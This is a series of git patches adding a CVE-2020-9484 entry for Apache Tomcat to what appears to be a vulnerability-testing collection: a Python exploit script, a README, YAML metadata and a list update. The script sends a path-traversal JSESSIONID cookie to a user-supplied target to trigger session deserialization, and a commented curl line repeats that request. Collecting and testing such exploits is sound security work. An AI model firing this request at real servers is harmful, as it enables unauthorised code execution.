From 2adeb161983136182da6c6df3998e279ea87f538 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:05:55 +0000 Subject: [PATCH 1/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202020?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-tomcat/2020/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-tomcat/2020/.keep diff --git a/cve/apache-tomcat/2020/.keep b/cve/apache-tomcat/2020/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 63975dc8cde0e5f03167bf643f598e5b612f78d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:09:48 +0000 Subject: [PATCH 2/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2020-9484?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-tomcat/2020/CVE-2020-9484/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/.keep diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/.keep b/cve/apache-tomcat/2020/CVE-2020-9484/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3258fd072e5920cf6e706e66ce619defc7b788d9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:10:15 +0000 Subject: [PATCH 3/9] aaa MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 于越 --- .../2020/CVE-2020-9484/CVE-2020-9484.py | 37 +++++++++++++++++++ .../2020/CVE-2020-9484/README.md | 13 +++++++ 2 files changed, 50 insertions(+) create mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py create mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/README.md diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py new file mode 100644 index 00000000..084b803f --- /dev/null +++ b/cve/apache-tomcat/2020/CVE-2020-9484/CVE-2020-9484.py @@ -0,0 +1,37 @@ +import requests +import os, sys + + + +def main(): + print("CVE: CVE-2020-9484") + RHOST = input("Target : ") + try: + u = requests.get(f"{RHOST}/index.jsp") + if u.status_code == 200: + print("Found Index Page") + pass + elif u.status_code == 404: + print("Looks Like we Could not Find index Page") + sys.exit() + header = { + "Cookie": "JSESSIONID=../../../../../usr/local/tomcat/groovy" + } + sett = requests.get(f"{RHOST}/index.jsp", headers=header) + if sett.status_code == 200: + print(sett.text) + #os.system(f"curl '{RHOST}/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' | grep -oh 'java' | sort -u == 'java' | tee result.txt | -o /dev/null") + #print("If Any Results They Will be Saved in result.txt") + print("Output ^") + if sett.status_code == 500: + print("Patched") + sys.exit() + + if sett.text == " ": + print("No Content") + pass + + except Exception as e: + print("Looks Like there Was A Problem Connecting to Target") + +main() diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/README.md b/cve/apache-tomcat/2020/CVE-2020-9484/README.md new file mode 100644 index 00000000..1f18c3ce --- /dev/null +++ b/cve/apache-tomcat/2020/CVE-2020-9484/README.md @@ -0,0 +1,13 @@ +# Tomcat-RCE +Apache Tomcat RCE +#Use +Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。攻击者可能可以构造恶意请求,造成反序列化代码执行漏洞。 +[-] Apache Tomcat RCE漏洞 (CVE-2020-9484) + + +# eg + +python3 CVE-2020-9484.py + +# reference +code from: https://github.com/RepublicR0K/CVE-2020-9484 -- Gitee From 53fb10c4e882155d261cef0aa58e21a531e6f7ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:10:28 +0000 Subject: [PATCH 4/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-tomcat/2020/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-tomcat/2020/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-tomcat/2020/.keep diff --git a/cve/apache-tomcat/2020/.keep b/cve/apache-tomcat/2020/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a621c3b68fd63e2decc6fc8b5ff2368598602796 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:10:34 +0000 Subject: [PATCH 5/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-tomcat/2020/CVE-2020-9484/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-tomcat/2020/CVE-2020-9484/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-tomcat/2020/CVE-2020-9484/.keep diff --git a/cve/apache-tomcat/2020/CVE-2020-9484/.keep b/cve/apache-tomcat/2020/CVE-2020-9484/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From c294bce8b4cec562dcce94fd49402f590aa16d28 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:10:49 +0000 Subject: [PATCH 6/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-tomcat/2020/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-tomcat/2020/yaml/.keep diff --git a/cve/apache-tomcat/2020/yaml/.keep b/cve/apache-tomcat/2020/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 05b19c7f945ac0a3325d1cbd9177afe2a74a25b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:11:02 +0000 Subject: [PATCH 7/9] aaa MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 于越 --- .../2020/yaml/CVE-2020-9484.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml new file mode 100644 index 00000000..e4cf2843 --- /dev/null +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-9484 +source: https://github.com/RepublicR0K/CVE-2020-9484 +info: + name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 + severity: high + description: + 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 + scope-of-influence: + Apache Tomcat < 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54, 7.0.0 to 7.0.103 + reference: + - https://seclists.org/oss-sec/2020/q2/136 + - https://www.seebug.org/vuldb/ssvid-98234 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.0 + cve-id: CVE-2020-9484 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2020, Apache, Tomcat, RCE -- Gitee From 609377cd83e29f0298d0fe6558d58709e0c53483 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:11:08 +0000 Subject: [PATCH 8/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-tomcat/2020/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-tomcat/2020/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-tomcat/2020/yaml/.keep diff --git a/cve/apache-tomcat/2020/yaml/.keep b/cve/apache-tomcat/2020/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7cb70172f49000f5def94a135fbd0f715d5f6b66 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BA=8E=E8=B6=8A?= Date: Mon, 13 Mar 2023 07:11:46 +0000 Subject: [PATCH 9/9] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 于越 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index b35d0b64..eb286f76 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -10,6 +10,7 @@ cve: - CVE-2021-27905 apache-tomcat: - CVE-2022-29885 + - CVE-2020-9484 apache-Spark: - CVE-2022-33891 linux-kernel: -- Gitee